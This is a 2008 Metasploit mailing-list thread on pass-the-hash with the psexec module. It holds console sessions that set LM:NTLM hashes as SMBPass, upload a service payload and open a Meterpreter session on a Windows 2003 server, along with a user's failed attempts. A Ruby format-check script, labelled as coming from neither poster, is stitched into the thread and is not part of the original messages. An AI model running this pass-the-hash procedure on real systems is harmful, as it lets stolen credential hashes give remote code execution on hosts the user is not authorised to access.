[framework] Using LM and NTLM Hashes with Metasploit's psexec

Kurt Grutzmacher grutz at jingojango.net
Sat Apr 12 11:24:54 CDT 2008


The format is LM:NTLM and the only way the library knows is by looking for
two 32-byte characters separated with a colon. What was the source of the
hashes? Any pass-the-hash technique must have the direct PW->Hash result,
anything that has been encrypted further with a nonce won't work. Also,
NTLMv2 is not yet supported so your target must negotiate to NTLMv1.

I just tried it against a Win2K3 server green install without a problem:

msf exploit(psexec) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \tCmiQnDv.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")
[*] You *MUST* manually delete the service file: %SYSTEMROOT%\tCmiQnDv.exe

[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Error: no response from dcerpc service
[*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555)
msf exploit(psexec) >

Kurt
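As an added example (not Metasploit's code and not from either poster), a small Ruby check that applies the rule Kurt describes, that SMBPass is only read as a hash pair when it is exactly two 32-hex-character strings joined by one colon, and shows why each of the quoted attempts was rejected. The hash values in it are constructed, and the dump-line helper assumes the quoted `::LM:NTLM:::` value was pasted from a line of the form `user:rid:LM:NTLM:::`.

```ruby
# Added example, not Metasploit code. Models the SMBPass rule from the thread:
# a value is an LM:NTLM pair only when it is two 32-hex-char strings joined by
# one colon; anything else is sent as a literal password. Values are constructed.
HEX32 = /\A\h{32}\z/

# Returns [kind, reason]; kind is :hash, :password or :invalid.
def classify_smbpass(value)
  fields = value.to_s.split(':', -1)
  # No colon at all: the module would use this as a plain password, so a bare
  # 32-hex string (the second quoted attempt) is never treated as a hash.
  return [:password, 'no colon, used as a plain password'] if fields.length == 1
  unless fields.length == 2
    return [:invalid, "#{fields.length} colon-separated fields, expected LM:NTLM"]
  end
  lm, nt = fields
  return [:invalid, "LM field is #{lm.length} chars, need 32 hex"] unless lm.match?(HEX32)
  return [:invalid, "NTLM field is #{nt.length} chars, need 32 hex"] unless nt.match?(HEX32)
  [:hash, 'recognised as an LM:NTLM pair']
end

# A whole dump line (user:rid:LM:NTLM:::) has seven fields and fails the check
# above, which is what the quoted ::LM:NTLM::: attempt looks like. This picks the
# LM:NTLM pair out of such a line (assumed format, not from the page).
def smbpass_from_dump_line(line)
  fields = line.strip.split(':', -1)
  raise ArgumentError, 'not a user:rid:LM:NTLM::: line' if fields.length < 4
  "#{fields[2]}:#{fields[3]}"
end

if __FILE__ == $0
  lm = '0123456789abcdef0123456789abcdef' # constructed, not a real hash
  nt = 'fedcba9876543210fedcba9876543210' # constructed, not a real hash
  ["#{lm}:#{nt}", nt, ":#{nt}:", "#{lm}:#{nt[0, 31]}"].each do |v|
    kind, why = classify_smbpass(v)
    puts "#{v.inspect} => #{kind} (#{why})"
  end
  puts classify_smbpass(smbpass_from_dump_line("Administrator:500:#{lm}:#{nt}:::")).inspect
end
```

The 31-character case mirrors the quoted attempts, where the NTLM value as pasted was one hex digit short.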

On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm>
wrote:

> Hi HD,
>  Thank you for your reply, but I can't seem to get it to work.  Also,
>  where would I get the NTLM response from?  I currently have the LM and
>  NTLM hashes, not responses.  I tried setting it to the LM:NTLM hash
>  but it failed.  I then tried it with just the NTLM hash and it also
>  failed.  Finally, I tried it in the :NTLM: format and it failed.
>  Here's an example of what it tells me (the hash isn't really important
>  since it's a test machine):
>
> msf exploit(psexec) > set SMBPass ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
> SMBPass => ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
> msf exploit(psexec) > exploit
> [*] Started reverse handler
> [*] Connecting to the server...
> [*] Authenticating as user 'Administrator'...
> [-] Exploit failed: Login Failed: The server responded with error:
> STATUS_LOGON_FAILURE (Command=115 WordCount=0)
>
> msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
> SMBPass => b9d2d4957b330b503cc792eb6a55bb1
> msf exploit(psexec) > exploit
> [*] Started reverse handler
> [*] Connecting to the server...
> [*] Authenticating as user 'Administrator'...
> [-] Exploit failed: Login Failed: The server responded with error:
> STATUS_LOGON_FAILURE (Command=115 WordCount=0)
>
> msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
> msf exploit(psexec) > exploit
> [*] Started reverse handler
> [*] Connecting to the server...
> [*] Authenticating as user 'Administrator'...
> [-] Exploit failed: Login Failed: The server responded with error:
> STATUS_LOGON_FAILURE (Command=115 WordCount=0)
>
> Also, how would psexec differentiate between you sending it an NTLM hash
> to use for authentication and you sending it a password?  In the example
> above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f?  How
> would psexec know that this was an NTLM hash and not a password?  Any
> ideas?  Thanks for your help.
>
> PS.  I'm currently running Metasploit v3.1.  After the failed attempts
> above, I verified that psexec works fine when I provide it with the real
> password and not the LM or NTLM hashes.
>
> > On Friday 11 April 2008, H D Moore wrote:
> > I think you can just set SMBPass to the NTLM response and call it done
> > (thanks grutz!).
> >
> > -HD
> >
> > On Friday 11 April 2008, Mathew Brown wrote:
> > > Hi,
> > >   After running info windows/smb/psexec in metasploit, it tells me:
> > >   "This module uses a valid administrator username and password (or
> > >   password hash) to execute an arbitrary payload."  I currently have
> > > the LM and NTLM hashes for a valid account on a remote machine but not
> > > the actual password.  How would I pass this information to the SMBPass
> > > variable.  Should I just put it as LM:HASH?  Thanks.
> > > --
> > >   Mathew Brown
> > >   mathewbrown at fastmail.fm
> --
>  Mathew Brown
>  mathewbrown at fastmail.fm
>